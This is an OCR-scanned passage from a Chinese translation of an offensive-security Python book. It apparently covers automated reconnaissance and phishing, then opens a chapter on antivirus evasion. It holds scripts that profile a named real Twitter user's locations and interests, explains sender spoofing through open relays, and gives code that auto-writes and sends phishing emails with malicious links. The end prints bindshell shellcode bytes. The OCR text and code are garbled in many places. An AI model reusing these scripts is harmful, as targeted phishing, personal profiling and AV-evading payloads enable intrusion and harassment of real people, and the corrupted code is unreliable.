想象 一 下 : 某 一 刻 ， 一 个 朋友 问 了 你 一 个 他 误 以 为 你 知道 答案 的 冷门 问题 ， 你 该 怎么 回 
答 呢 ? 用 谷歌 搜 一 下 吧 。 于 是 这 个 访问 量 最 大 的 网 站 被 频繁 使 用 ， 以 至 于 变 成 了 一 个 动词 。 
那么 ， 我 们 该 如 何 找到 更 多 关于 目标 公司 的 信息 呢 ? 好 吧 ， 答 案 还 是 谷歌 。 谷 歌 提 供 了 一 个 
应 用 程序 编程 接口 (API) ， 它 让 程序 员 能 执行 查询 操作 ， 获 取 结 果 ， 而 不 必 使 用 和 精通 “ 正 
常 ”的 谷歌 界面 。 目 前 谷歌 有 两 个 API， 一 个 简化 版 的 和 一 个 完整 的 ， 使 用 完整 的 API 需要 
持 有 开发 者 密 钥 CSM, 2010) 。 因 为 每 个 开发 者 密 钥 都 是 独一无二 的 ， 这 就 使 得 匿名 性 根 
本 无 从 谈 起 ， 而 我 们 之 前 和 干 辛 万 苦 写 出 来 的 那些 脚本 也 就 打 了 水 漂 。 幸 运 的 是 ， 简 化 版 的 
API 每 天 仍 能 进行 相当 数量 的 查询 ， 每 次 搜索 能 得 到 约 30 个 结果 。 对 我 们 的 目标 一 一 搜集 信 
息 ，30 个 查询 结果 已 经 足够 让 你 对 一 个 组 织 机 构 的 网 络 现状 有 个 大 致 了 解 。 我 们 将 从 头 开 始 
编写 查询 函数 ， 使 其 可 以 给 攻击 者 返回 他 感 兴趣 的 信息 。 
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谷歌 的 反应 看 上 去 类 似 于 下 面 这 个 烂摊子 : 
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{"responseData": {"results": [{"GsearchResultClass":"GwebSearch", 
"unescapedUrl": "http: //www.boondocksaints.com/","url":"http:// 
www. boondocksaints.com/","visibleUrl":"www.boondocksaints. 

com", "cacheUrl": "http: //www.google.com/search?q\ 
u003dcache: J3XWOwgXgn4J:www.boondocksaints.com","title":"The \ 
-u003cb\u003eBoondock Saints\u003c/b\u003e", et “The 
Boondock i . 
<..SNIPPED, .> | 

\u003cb\u003e...\u003c/b\u003e"}], "cursor": {"resultCount": "62,800", 
"pages": [{"start":"0", "label":1}, ("start":"4","label":2},{"start 
"eB" “Label"23},{"start™:"12", *“label™: 4}, {*start"™ +716"), "label": 
5},{"start":"20", "label":6}, ("start":"24","label":7}, {"start":"2 
8", "label":8}],"estimatedResultCount":"62800", "current PageIndex" 
:0,"moreResultsUrl":"http://www.google.com/search?oe\u003dutf8\ 
u0026ie\u003dut£8\u0026source\u003duds\u0026start\u003d0\u0026h1\ 
"responseDetails": null, “responseStatus": 200} | 


调用 urllib 库 中 的 quote_ plus0 函 数 是 这 个 脚本 中 的 第 一 行 新 代码 。URL 编码 CURL 
encode) 是 指 非 字 母 数 字 字 符 转 换 成 能 被 发 送 到 Web 服务 器 中 的 编码 形式 的 方法 (Wilson, 
2005) « RTI URL: MB TT Aire 但 它 已 足够 满足 我 们 的 要 求 了 。 最 后 那 句 
print 语句 显示 的 是 谷歌 的 响应 数据 : 夹杂 着 花 插 号 、 方 插 号 和 引号 的 一 长 串 字 符 串 。 如 果 你 
仔细 观察 它 ， 响 应 回来 的 数据 看 起 来 与 Python 中 的 词典 非常 相似 。 其 实 ， 响 应 的 数据 是 
JSON 格式 的 ， 在 实践 中 ， 它 与 词典 非常 类 似 ， 而 且 毫 无 悬念 ，Python 自 带 了 处 理 ISON 字符 
串 的 库 。 我 们 把 它 添加 到 函数 中 并 重新 解析 得 到 的 结果 。 


import json, urllib 
from anonBrowser import * 
def google (search term) : 

ab = anonBrowser () 

‘Search term = urllib.quote_plus (search term) 
response = ab.open('http://ajax. googleapis.com/'+\ 
'ajax/services/search/web?v=1.0&q=' + search term) 
objects = json.load(response) — 
print objects 

google ('Boondock Saint") 


当 objects 中 的 内 容 被 打印 出 来 时 ， 它 看 上 去 与 第 一 个 函数 中 用 response.read() 函 数 打印 出 
来 的 内 容 相 似 。 其 实 json 库 已 经 把 响应 得 到 的 数据 加 载 到 一 个 词典 中 ， 把 其 中 的 各 个 字段 都 
以 易于 访问 的 形式 标记 了 出 来 ， 而 不 需要 人 工 解析 这 个 字符 串 。 


{u'responseData': {u'cursor': {u'moreResultsUrl': u'http://www.google. 


214 


第 6 章 用 Python 刺探 网 络 


现在 我 们 可 以 想 想 在 一 个 给 定 的 谷歌 搜索 结果 中 都 有 什么 。 显 然 ， 返 回 的 页 面 链 接 是 非 
常 重要 的 。 此 外 ， 网 页 的 标题 (title) 和 用 搜索 引擎 找到 的 谷歌 用 来 供用 户 预 览 网 页 的 那 一 小 
段 文 字 ， 对 我 们 理解 链接 所 指向 的 网 页 到 底 是 做 什么 的 很 有 帮助 。 为 了 能 更 好 地 组 织 得 到 的 
结果 ， 我 们 来 编写 一 个 不 带 任何 额外 方法 的 类 保存 数据 。 这 将 使 访问 各 个 字段 变 得 更 加 容 
易 ， 而 不 必 专 为 获取 信息 而 特意 去 临时 解析 三 层 词典 。 





Python 绝技 : 运用 Python 成 为 顶级 黑客 
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用 Python 解析 Tweets 个 人 主页 


现在 ， 我 们 的 脚本 已 经 能 自动 收集 一 些 与 我 们 侦察 目标 相关 的 信息 了 。 在 接 下 来 的 步骤 
中 ， 我 们 将 目标 转 到 具体 的 个 人 和 组 织 机 构 上 ， 并 开始 寻找 特定 的 个 人 和 在 网 上 能 找到 的 关 
Fie AD 的 信息 。 

和 谷歌 一 样 ，Twitter 也 给 开发 者 提供 了 API。 相 关 文 档 位 于 https://dev.twitter.com/docs, 
其 中 的 内 容 非 常 详 细 ， 并 提供 了 大 量 在 本 程序 中 没有 使 用 的 特征 (Twitter, 2012) 。 

现在 ， 我 们 来 研究 如 何 从 Twitter 上 获取 数据 。 具 体 地 说 ， 我 们 提取 出 一 个 名 为 
“th3j35t3r” 的 美国 爱国 者 黑客 所 发 出 的 和 转发 的 所 有 推 文 。 因 为 他 是 用 “Boondock Saint” 作 
为 他 在 Twitter 上 的 昵称 的 ， 我 们 将 用 它 来 创建 一 个 reconPerson0 对 象 ， 并 输入 “th3j35t3r” 
作为 Twitter 搜索 的 关键 字 。 
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尽管 对 Twitter 中 数据 的 获取 还 没 结 束 ， 但 我 们 已 经 看 到 了 大 量 对 我 们 了 解 这 名 美国 爱国 
者 黑客 是 很 有 用 的 信息 。 我 们 看 到 ， 他 目前 与 UGNazi 黑客 组 织 有 点 冲突 ， 并 拥有 了 自己 一 


定数 量 的 支持 者 。 好 奇 心 萌 动 了 起 来 ， 想 知道 还 能 找 出 些 什么 东西 来 。 
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None, 'from user': u'p\u0lddz\u0131u0d\u0250\u01dd\u028d \u029e\ 
u0254opuoog'}, {'tweet': u'RT @droogielxp: "Do you expect me to © 
talk?" - #UGNazi "No #UGNazi I expect you to die." @th3j35t3r 
#ticktock', 'geo': None, ‘from _user': u'p\u0lddz\u0131luo0d\u0250\ 
udldd\u028d \u029e\u02540puceg'}, {'tweet’: u'RT @Tehvar: @th3j35t3r 
‘my thesis paper for my masters will now be focused on SuPPorting the 
#wwp, while I can not donate money I can gate intelligence. J 
<..SNIPPED. .> - 


希望 你 看 了 这 个 代码 后 认为 “拜托 ， 我 知道 该 怎么 做 ! ”。 没 错 ! 不 久之 后 你 就 可 以 开 
始 按照 这 一 模式 从 互联 网 上 获取 信息 。 很 显然 ， 我 们 现在 没有 对 Twitter 返回 的 结果 进行 处 
理 ， 从 中 获取 与 我 们 的 目标 相关 的 信息 。 在 涉及 获取 有 关 个 人 的 信息 时 ， 社 交 媒 体 平台 就 好 
比 金 矿 。 和 生日、 籍贯 ， 以 及 家 庭 住 址 、 电 话 号 码 ， 或 亲友 信息 使 得 那些 不 怀 好 意 的 人 可 以 瞬 
间 获 得 他 人 的 信任 。 人 们 往往 没有 意识 到 以 不 安全 的 方式 使 用 这 些 网 站 可 能 会 导致 的 问题 。 
让 我 们 进一步 检查 Twitter 返回 的 这 些 数据 ， 从 中 提取 出 地 理 位 置信 息 。 


从 推 文中 提取 地 理 位 置信 息 


许多 Twitter 用 户 遵循 一 个 不 成 文 的 公式 撰写 他 们 的 推 文 与 世界 分 享 。 通 常情 况 下 ， 这 个 
AXA: [该 推 文 是 直接 推 给 哪些 推 特 用 户 的 ]+[ 推 文 的 正文 ， 其 中 常会 含有 简短 的 
URL]+[hash 标签 ]， 其 他 一 些 ， 比 如 图 像 或 (我 们 希望 看 到 的 ) 地 理 位 置信 息 ， 可 能 会 ， 但 
并 不 总 是 会 出 现在 推 文 的 正文 中 。 不 过 ， 如 果 后 退 一 步 从 攻击 者 的 角度 查看 这 个 公式 ， 使 用 
恶意 的 分 割 法 时 ， 这 个 公式 应 该 写成 : [关注 该 用 户 的 人 ， 他 们 信任 来 自 该 用 户 的 通信 的 概率 
会 比较 大 ]+[ 这 个 人 感 兴趣 的 链接 或 主题 ， 他 可 能 也 会 对 该 话题 中 的 其 他 内 容 感 兴趣 ]+[ 这 个 人 
可 能 想 要 进一步 了 解 的 大 致 方向 或 主题 ]。 对 那些 想 要 在 该 对 象 数据 库 中 加 入 更 进一步 的 细节 
信息 《比如 这 个 人 经 常 去 哪里 吃 早餐 ) 的 朋友 来 说 ， 照 片 或 地 理 位 置信 息 或 许 已 经 不 再 是 有 
用 或 有 趣 的 花 各 了。 尽管 这 可 能 是 一 种 偏执 的 看 法 ， 但 我 们 现在 能 自动 从 每 个 推 文 返 回 的 数 
据 中 搜集 这 些 信息 。 

import json 

import urllib 

import optparse 

from anonBrowser import * 

def get_tweets (handle): 

| query = urllib. quote _plus('from:' + handle+\. 


~" since:2009-01-01 nea? 全 
tweets = [] IIS | 
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为 了 测试 我 们 的 脚本 ， 我 们 建立 一 个 有 职业 棒球 大 联盟 球 队 的 城市 名 单 。 接 下 来 ， 我 们 
抓 取 Twitter 账户 名 称 为 波士顿 红 袜 队 (Boston Red Sox) 与 华盛顿 国民 队 〈Washington 
Nationals) 的 相关 信息 。 我 们 看 到 红 袜 队 目 前 正在 多 伦 多 比赛 ， 而 国民 队 在 丹佛 。， 





用 正则 表达 式 解 析 Twitter 用 户 的 兴趣 爱好 


接 下 来 ， 我 们 将 收集 目标 对 象 的 兴趣 爱好 ， 以 及 这 些 内 容 是 否 也 被 其 他 Twitter 用 户 或 其 
他 网 民 所 关注 。 不 论 何 时 ， 网 站 会 让 你 有 机 会 了 解 目 标 对 象 关 注 的 内 容 ， 并 跳 转 到 那里 去 ， 
而 这 些 数据 将 会 构成 一 次 成 功 的 社会 工程 攻击 的 基石 。 如 前 所 述 ，Twitter 上 任何 关注 的 内 容 
都 表现 为 〈 推 文中 ) 的 链接 、hash 标签 及 其 他 Twitter 用 户 提 及 的 内 容 。 对 正则 表达 式 来 说 ， 
查找 这 些 信息 绝对 是 小 菜 一 碟 。 
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运行 这 个 兴趣 爱好 解析 脚本 ， 我 们 可 以 看 到 它 解析 出 了 综合 格斗 运动 员 Chael Sonnen 
( 推 文中 的 ) 链接 、@ 过 的 用 户 以 及 hash 标签 一 综合 格斗 选手 切 尔 - 松 恩 。 注 意 ， 它 返回 了 
一 个 YouTube 视频 、 一 些 @ 过 的 用 户 和 hash 标签 。 其 中 ， 这 个 hash 标签 是 一 场 他 和 当时 
(2012 年 6 月 ) 的 UFC 格斗 大 赛 冠 军 Anderson Silva 的 比赛 录像 。 我 们 的 好 奇 心 再 次 萌动 ， 
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在 这 里 ， 用 正则 表达 式 搜 寻 信 息 并 不 是 最 佳 的 方法 。 因 为 很 难 用 一 个 正则 表达 式 就 把 所 
有 可 能 的 URL 全 都 表示 出 来 ， 所 以 用 正则 表达 式 搜寻 文本 中 的 链接 有 可 能 会 漏 掉 某 些 类 型 的 
URL。 但 对 我 们 来 说 ， 这 个 正则 表达 式 在 99% 的 时 间 里 是 有 效 的 。 另 外 ， 我 们 的 函数 还 要 使 
用 urllib2 库 ， 而 不 是 我 们 自己 写 的 anonBrowser 类 来 打开 (用 正则 表达 式 找到 的 ) 链接 。 

和 上 次 一 样 ， 我 们 还 是 会 用 一 个 词典 ， 把 相关 信息 分 门 别 类 地 存放 到 这 个 更 易于 管理 的 
数据 结构 中 ， 这 样 就 不 必 专 为 解析 结果 而 编写 一 个 全 新 的 类 。 由 于 推 文 的 字数 限制 ， 大 多 数 
URL 会 使 用 各 个 服务 商 提供 的 短 网 址 。 这 些 链 接 里 没什么 信息 量 ， 因 为 他 们 可 以 指向 任何 地 
方 。 为 了 把 短 网 站 转 成 正常 的 URL， 我 们 可 以 用 urllib2 打开 它们 ， 在 脚本 打开 页 面 后 ，urllib 
可 以 获取 到 完整 的 URL。 至 于 对 象 @ 过 的 用 户 和 hash 标签 ， 也 是 用 类 似 的 正则 表达 式 提 取 ， 
并 且 将 结果 返回 给 master twitter0 方 法 。 推 特 用 户 的 地 理 位 置 和 兴趣 爱好 最 终 也 会 返回 给 
reconPerson 类 以 外 的 调用 者 。 

还 有 其 他 一 些 能 拓展 处 理 推 特 数据 方法 的 功能 的 事情 可 以 做 。 互 联网 上 能 找到 几乎 无 限 
多 的 资源 ， 也 有 无 数 的 方法 可 以 分 析 数 据 ， 但 对 自动 信息 收集 程序 能 力 需求 也 是 不 断 增长 
的 。 

在 结束 我 们 这 个 侦查 Twitter 用 户 的 系列 专题 时 ， 我 们 编写 一 个 类 ， 封 装 所 有 抓 取 的 地 理 
位 置 、 兴 趣 爱好 及 Twitter 页 面 的 代码 。 在 下 一 节 中 ， 你 会 发 现 这 个 类 是 很 有 用 的 。 
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if cityFile != None: 
for line in open(cityFile) .readlines(): 
city = line.strip('\n').strip('\r') .lower() 
cities.append (city) 
locations = [] 
locCnt = 0 
cityCnt = 0 
tweetsText = '' 
for tweet in self.tweets: 
if tweet['geo'] != None: 
- locations.append(tweet['geo']) | 
locCnt += 1 
tweetsText += tweet ['tweet'] .lower() 
for city in cities: 
if city in tweetsText: 
locations.append (city) 
cityCnt += 1 
return locations 


匿名 电子 邮件 


现在 越 来 越 多 的 网 站 开始 要 求 用 户 在 访问 网 站 中 最 好 的 资源 时 注册 并 登录 一 个 账户 。 这 
显然 就 带 来 了 一 个 问题 ， 用 我 们 的 browser 类 浏览 这 些 网 站 就 会 比 正常 浏览 它们 要 困难 得 多 。 
要 求 登 录 显然 把 完全 匿名 上 网 的 可 能 性 变 成 了 0 一 一 因为 登录 后 的 任何 操作 都 会 与 登录 的 账户 
关联 起 来 。 大 多 数 网 站 在 注册 时 ， 只 需要 一 个 有 效 的 电子 邮箱 地 址 ， 并 不 检查 所 提供 的 其 他 
个 人 信息 的 真实 性 。 网 上 由 谷歌 或 雅虎 之 类 的 公司 提供 的 电子 邮箱 都 是 免费 的 ， 注 册 起 来 也 
很 方便 ， 但 你 也 必须 理解 并 接受 他 们 提出 的 服务 条 球 。 

相对 于 获取 一 个 永久 性 电子 邮箱 ， 使 用 一 次 性 电子 邮箱 也 是 男 一 个 很 好 的 选项 。 
http://10minutemail.com/10MinuteMail/index.html 上 的 “Ten Minute Mail” (TAERA) 提供 
的 就 是 这 样 一 种 一 次 性 电子 邮箱 。 攻 击 者 可 以 使 用 这 种 很 难 被 追踪 的 电子 邮件 账户 去 创建 社 
交 网 站 账号 ， 这 样 其 行为 就 无 法 关联 到 自己 的 账户 上 。 大 多 数 网 站 都 有 一 个 最 低 限 度 的 “ 服 
务 条 款 ” 文 档 ， 其 中 不 允许 收集 其 他 用 户 的 信息 。 但 是 ， 真 正 的 攻击 者 是 不 会 受 这 些 规 则 束 
缚 的 ， 把 相关 技术 应 用 在 个 人 账户 上 ， 恰 恰 充 分 展示 了 他 们 的 能 力 。 记 住 ， 话 虽 如 此 ， 但 同 
样 的 操作 也 可 能 反 过 来 作用 在 你 的 身上 ， 你 应 该 在 取出 时 ， 确 保 你 的 账户 不 会 被 这 样 黑 掉 。 
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批量 社工 


到 现在 为 止 ， 我 们 已 经 收集 了 大 量 有 价值 的 信息 ， 能 较 全 面 地 勾勒 出 给 定 目标 对 象 的 轮廓 。 

使 用 这 些 信息 自动 编写 电子 邮件 是 一 个 很 讲究 技巧 性 的 联系 ， 特 别 是 我 们 要 给 对 象 提 供 
足够 多 的 细节 信息 ， 以 博取 他 的 信任 时 就 尤为 如 此 。 要 做 到 这 一 点 ， 一 种 方法 是 让 程序 把 获 
取 到 的 所 有 信息 全 部 罗列 出 来 ， 然 后 退出 。 接 下 来 就 要 靠 攻击 者 利用 手头 现 有 的 信息 ， 手 工 
编写 一 封 电子 邮件 。 不 过 要 靠 人 工 给 一 个 庞大 的 组 织 机 构 里 的 每 个 人 都 发 送 这 样 一 封 电子 邮 
件 实在 是 一 件 不 靠 谱 的 事 。Python 的 强大 功能 允许 我 们 自动 完成 这 一 过 程 ， 并 快速 获得 结 
果 。 出 于 演示 的 目的 ， 我 们 将 使 用 收集 到 的 信息 ， 编 写 一 封 非常 简单 的 电子 邮件 ， 并 自动 把 
它 发 送 给 我 们 的 目标 对 象 。 


使 用 Smtplib 给 目标 对 象 发 邮件 


正常 发 送 邮 件 的 过 程 包 括 打开 邮件 客户 端 ， 单 击 相 应 的 选项 ， 然 后 单 击 新 建 ， 最 后 单 击 
发 送 。 在 电脑 屏幕 后 ， 邮 件 客 户 端 程序 会 连接 到 服务 器 ， 有 时 还 需要 登录 ， 并 提交 详细 的 信 
恩 一 一 发 件 人 、 收 件 人 和 其 他 必要 的 数据 。 Python 库 和 smtplib 允许 我 们 的 程序 完成 这 一 操 
作 。 我 们 会 先 用 Python 编写 一 个 电子 邮件 客户 端 程序 ， 用 它 把 我 们 的 恶意 电子 邮件 发 送 给 目 
标 对 象 。 这 个 客户 端 只 实现 了 最 基本 的 功能 ， 但 它 会 为 让 我 们 在 程序 的 其 他 部 分 中 很 方便 地 
发 送 电子 邮件 。 在 达成 我 们 的 目的 时 ， 我 们 将 使 用 谷歌 的 Gmail SMTP 服务 器 ， 在 使 用 这 个 
脚本 时 ， 你 需要 注册 一 个 谷歌 的 Gmail 账户 ， 或 者 对 自己 的 SMTP 服务 器 修改 相关 设置 。 


import smtplib | 
from email.mime.text import MIMEText 
def sendMail (user, pwd, to, subject, text) : 
msg = MIMEText (text) 
msg{'From'] = user 
—msg['To'] = to 
omsg['Subject"] = subject 
Bet a | | 
smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 
print "[+] Connecting To Mail Server." 
smtpServer.ehlo() ; 
print "[+] Starting Encrypted Session." 
smtpServer.starttls() 
smtpServer.ehlo() 
print "[+] Logging Into Mail Server." 
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smtpServer.login(user, pwd) 
print "[+] Sending Mail." 
smtpServer.sendmail (user, to, msg.as_string()) 
smtpServer.close () 
print "[+] Mail Sent Successfully." 
except: 
print "[-] Sending Mail Failed." 

user = '‘username' | 

pwd = ‘password! 

sendMail(user, pwd, 'target@tgt.tgt', \ 

"Re: Important', 'Test Message') 


运行 这 个 脚本 ， 然 后 检查 一 下 目标 邮箱 的 收 件 箱 ， 我 们 看 到 它 成 功 地 使 用 了 Python 的 
smtplib 发 送 了 一 封 电 子 邮件 。 

recon:# python sendMail.py 

[+] Connecting To Mail Server. 

[+] Starting Encrypted Session. 

[+] Logging Into Mail Server. 

[+] Sending Mail. 

[+] Mail Sent Successfully. 

在 脚本 中 写 好 一 个 有 效 的 电子 邮件 服务 器 地 址 及 其 他 参数 ， 该 客户 端 就 会 正确 地 发 送 电 
子 邮件 至 该 地 址 。 不 过 许多 电子 邮件 服务 器 是 不 允许 转发 邮件 的 ， 所 以 只 能 将 邮件 传递 到 指 
定 的 地 址 。 本 地 电子 邮件 服务 器 可 以 被 设 为 允许 转发 邮件 ， 或 允许 转发 来 自 网 上 的 邮件 ， 这 
时 它 会 把 来 自任 意 地 址 的 电子 邮件 转发 到 任意 地 址 中 一 一 即使 邮件 地 址 的 格式 都 不 对 也 没 关 
系 。 垃 圾 邮件 使 用 同样 的 技术 ， 可 以 发 送 发 信 地 址 为 : Potus@whitehouse.gov 的 邮件 一 一 他 们 
只 要 伪造 这 个 发 信 地 址 即 可 。 由 于 如 今 很 少 有 人 会 打开 来 自 可 疑 地 址 的 邮件 ， 所 以 我 们 能 不 
能 伪造 发 信 地 址 就 是 关键 。 使 用 这 个 邮件 客户 端 脚本 ， 再 加 上 一 个 允许 转发 邮件 的 服务 器 ， 
攻击 者 就 能 发 送 一 份 看 上 去 像 是 来 自 可 信 地 址 的 电子 邮件 一 一 这 会 增加 目标 对 象 点 击 它 的 概 
率 。 


用 smtplib 进 行 网 络 钓鱼 


我 们 终于 到 了 把 我 们 所 有 的 研究 结果 整合 到 一 起 的 阶段 。 这 里 ， 脚 本 会 编写 一 份 像 来 目 
目标 对 象 朋友 的 电子 邮件 ， 邮 件 中 的 内 容 是 目标 用 户 所 关心 的 ， 而 且 看 上 去 就 像 一 个 真人 写 


1 美国 总 统 的 电子 邮箱 。 一 一 译 者 注 
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的 那样 。 为 了 让 计算 机 与 他 人 通信 时 看 上 去 像 真 人 那样 ， 已 经 进行 了 大 量 的 研究 ， 但 许多 技 
术 仍 不 是 很 完美 。 为 了 降低 被 识破 的 概率 ， 我 们 只 生成 一 段 非常 简单 的 含有 恶意 代码 的 文 
本 ， 把 它 作 为 邮件 的 正文 。 我 们 的 程序 会 根据 它 所 拥有 的 数据 ， 随 机 生成 文本 。 具 体 步 又 
是 : 选择 一 个 虚假 的 发 信人 电子 邮箱 地 址 ， 指 定 一 个 主题 ， 生 成 正文 文本 ， 然 后 发 送 电 子 邮 
件 。 垃 运 的 是 ， 搞 定 发 信人 地 址 和 主题 还 是 相当 简单 的 。 

代码 在 处 理 if 语句 和 如 何 将 一 些 语句 整合 在 一 起 ， 并 形成 一 个 简短 而 连贯 的 信息 的 问题 
上 费 尽 了 心机 。 如 果 在 可 用 的 数据 量 非 常 大 的 情况 下 一 一 在 我 们 的 侦查 代码 从 多 个 数据 源 
(网 站 ) 采集 数据 时 ， 确 实 会 发 生 ， 段 落 中 的 每 一 小 段 通常 会 分 给 许多 不 同 的 方法 去 生成 ， 每 
个 方法 只 负责 以 特定 的 方式 生成 自己 负责 的 那 一 小 段 文 本 ， 并 以 独立 于 其 他 代码 的 方式 完成 
操作 。 以 这 种 方法 组 织 代码 ， 在 获取 到 大 量 目标 对 象 关注 的 内 容 时 ， 我 们 也 只 要 修改 相关 方 
法 就 可 以 。 ie eta 生 然后 相信 那个 人 
春 到 会 去 完成 剩 下 的 操作 就 是 。 这 一 攻击 过 程 的 另 一 部 分 也 就 是 本 章 中 没有 讨论 的 : 编写 一 
段 漏洞 利用 代码 ， 或 搭建 一 pa piven 在 这 个 例子 中 ， 我 们 只 是 发 送 了 一 
个 显示 的 内 容 与 实际 链接 的 内 容 不 一 致 的 超 链接 ， 但 攻击 代码 也 可 以 放 在 附件 。 钓鱼 网 站 
中 ， 或 者 攻击 者 能 想到 的 其 他 任何 方式 。 这 一 攻击 过 程 可 以 对 组 织 机 构 中 的 每 一 名 成 员 都 做 
一 过 ， 只 要 有 一 个 人 跌 入 陷阱 ， 就 会 赋予 攻击 者 访问 权限 。 

我 们 这 个 脚本 是 利用 目标 对 象 留 在 Twitter 中 可 以 公开 访问 的 信息 对 他 进行 攻击 的 。 根 据 
它 会 找到 关于 目标 对 和 象 的 地 理 位 置信 息 、@ 过 的 用 户 、hash 标签 以 及 链接 ， 脚 本 就 会 生成 和 
发 送 一 个 带 有 恶意 链接 的 电子 邮件 ， 等 待 目 标 对 象 去 点 击 。 


import smtplib 
import optparse 
from email.mime.text import MIMEText 
from twitterClass import * 
from random import choice 
-def sendMail(user,pwd,to,subject, cee 
msg = MIMEText (text) 
msg[‘From'] = user 
msg[{'To’] = to 
msg['Subject'] = subject 
try: 
smtpServer = smtplib.SMTP('smtp.gmail.com', SSA 
print "[+] Connecting To Mail Server." 
smtpServer.ehlo() 
print "[+] Starting Encrypted Session." 
smtpServer.starttls (). | 
smtpServer.ehlo() 
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测试 脚本 可 以 看 到 ， 我 们 可 以 从 波士顿 红 袜 队 的 Twitter 账户 上 获得 一 些 与 他 们 相关 的 信 
息 ， 并 向 他 们 发 送 一 封 恶意 垃圾 邮件 。 


- 





本 章 小 结 


尽管 这 一 攻击 方法 不 应 被 用 在 其 他 人 或 其 他 组 织 机 构 身 上 ， 但 是 意识 到 它 的 活力 ， 以 及 
你 所 在 的 组 织 机 构 是 否 易 受 攻击 是 非常 重要 的 。Python 和 其 他 脚本 语言 能 让 程序 员 快 速 实现 
各 种 使 用 网 上 多 个 信息 资源 获取 并 可 能 利用 这 一 优势 的 方法 。 在 我 们 编写 的 代码 里 ， 我 们 创 
建 了 一 个 类 ， 它 能 模仿 一 个 Web 浏览 器 ， 在 其 中 加 上 匿名 性 ， 能 从 网 站 上 抓 取 网 页 ， 使 用 谷 
歌 的 强大 功能 并 利用 推 特 获 取 关 于 目标 对 象 的 大 量 信息 ， 最 终 把 所 有 这 些 细节 拼 在 一 起 ， 向 
目标 对 象 发 送 一 封 特别 为 之 精心 制作 的 电子 邮件 。 上 网 速度 会 限制 程序 执行 的 速度 ， 所 以 把 
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各 个 函数 线程 化 会 明显 加 快 程序 执行 一 次 所 需 的 时 间 。 此 外 ， 一 旦 我 们 学 会 了 如 何 从 一 个 数 
据 源 中 提取 信息 之 后 ， 从 其 他 网 站 上 提取 相关 的 信息 就 不 过 是 举 手 之 劳 。 仅 靠 人 工 是 无 法 访 
问 和 处 理 网 上 的 海量 信息 的 ， 但 是 借助 Python 和 其 库 的 强大 功能 ， 我 们 访问 各 类 资源 的 速度 
甚至 会 比 几 个 训练 有 素 的 专家 还 要 快 。 知 道 这 些 后 ， 我 们 就 能 理解 这 些 攻击 并 不 是 你 原来 想 
象 的 那样 高 深 葛 测 。 那 么 你 所 在 的 组 织 机 构 是 不 是 易 受 攻击 的 昵 ?” 攻 击 者 在 把 你 当成 目标 对 
象 时 ， 能 从 公开 渠道 获得 哪些 相关 信息 呢 ? 你 会 成 为 这 种 用 Python 抓 取 公开 的 社交 信息 ， 并 
以 此 编造 恶意 电子 邮件 的 攻击 方式 的 受害 者 吗 ? 
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第 7 章 ”用 Python 实现 免 杀 


本 章 简介 : 
e 使 用 Python 的 Ctypes 库 。 
e 使 用 Python 实现 免 杀 。 
。 使 用 Pyinstaller 生成 一 个 Win32 可 执行 文件 。 
。 利用 HTTPLib 实现 GET/POST HTTP 请 求 。 
© 与 一 个 在 线 病 毒 扫 描 器 进行 交互 操作 。 


E (ERR) 是 一 门 连 瘦小 的 人 都 可 以 迫使 你 承认 失败 的 艺术 ， 无 论 你 
有 多 强壮 ， 还 是 多 狂怒 。 


一 一 Saulo Ribeiro， 巴 西 柔 术 六 次 世界 冠军 


引言 : 火焰 腾 起 | 


2012 年 5 H 28 日 ， 伊 朗 马 赫 中 心 (Maher Center) 检测 到 一 次 对 其 网 络 进行 的 复杂 而 又 
厉害 的 电子 攻击 (CERTCC，2011) 。 这 次 攻击 是 如 此 漂亮 ， 以 至 于 所 有 参与 检测 的 43 个 杀 
毒 引 擎 没有 一 个 能 识别 出 攻击 中 使 用 的 代码 是 具有 恶意 的 。 出 现在 伊朗 被 入 侵 系 统 中 的 这 个 
因 在 代码 中 发 现 的 一 些 字 符 串 而 被 命名 为 “火焰 ” (Flame) 的 恶意 软件 ， 是 一 次 国家 级 的 电 
子 间谍 行动 (Zetter, 2012) 。 在 用 被 称 为 Beetlejuice、Microbe、Frog、Snack 和 Gator 的 Lua 
脚本 编译 后 ， 该 恶意 软件 可 以 通过 蓝牙 标识 出 被 其 侵入 的 计算 机 、 秘 密 录 音 ， 入 侵 附 近 的 计 
算 机 并 往 远 程 命令 和 控制 服务 器 上 传 屏 幕 截图 和 数据 (Analysis Team, 2012) 。 

据 估 计 ， 这 个 恶意 软件 已 经 问世 两 年 了 。 卡 巴 斯 基 实验 室 很 快 把 它 解 释 为 : 火焰 病毒 是 
“人 迄今 为 止 所 发 现 的 最 复杂 的 威胁 之 一 。 它 很 大 ， 而 且 令 人 难以 置信 的 厉害 ” (Gostev， 
2012) 。 但 是 杀毒 引擎 怎么 会 在 两 年 之 久 的 时 间 内 检测 不 到 它 呢 ? AARE — E MOA 
始 结合 使 用 诸如 启发 式 或 用 户 评价 (reputation scoring) 这 些 概念 上 还 是 全 新 的 更 复杂 的 方 
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法 ， 但 大 多 数 杀 毒 引 警 仍 在 使 用 基于 特征 码 的 检测 作为 主要 的 检测 手段 。 

在 最 后 一 章 中 ， 我 们 将 要 生成 一 小 段 能 够 逃避 杀毒 引擎 检测 的 恶意 软件 。 所 使 用 的 思想 
大 部 分 来 自 Mark Baggett 的 工作 ， 大 约 一 年 前 Baggett 把 他 的 方法 共享 给 了 SANS 渗透 测试 博 
SAGA] (Baggett, 2011) 。 截 至 本 章 编写 时 ， 这 些 绕 过 杀毒 程序 的 方法 依然 有 效 。 仿 照 
用 Lua 脚本 编译 的 火焰 病毒 ， 在 完成 免 杀 时 ， 我 们 将 实现 Mark 的 方法 ， 并 把 Python 代码 编 
译 到 一 个 Windows 可 执行 文件 中 。 


杀 的 过 程 


为 了 创建 一 个 恶意 软件 ， 我 们 需要 一 些 恶意 代码 。 在 Metasploit 框架 中 包含 有 一 个 恶意 代 
码 库 (本 书 编写 时 有 250 个 ) 。 我 们 使 用 Metasploit 生成 C 语言 风格 的 一 些 shellcode 作为 恶 
意 载荷 。 我 们 将 使 用 一 个 简单 的 Windows bindshell， 它 会 把 选 定 的 一 个 TCP 端口 与 cmd.exe 
进程 绑 定 在 一 起 : 这 使 攻击 者 能 够 远程 连 上 一 台 计 算 机 ， 并 通过 与 cmd.exe 进程 交互 发 布 命 
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"\x53\x53\x57\x68\x74\xec\x3b\xel\xf£\xd5\x57\x89\xc7\x68\x75" 
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" 
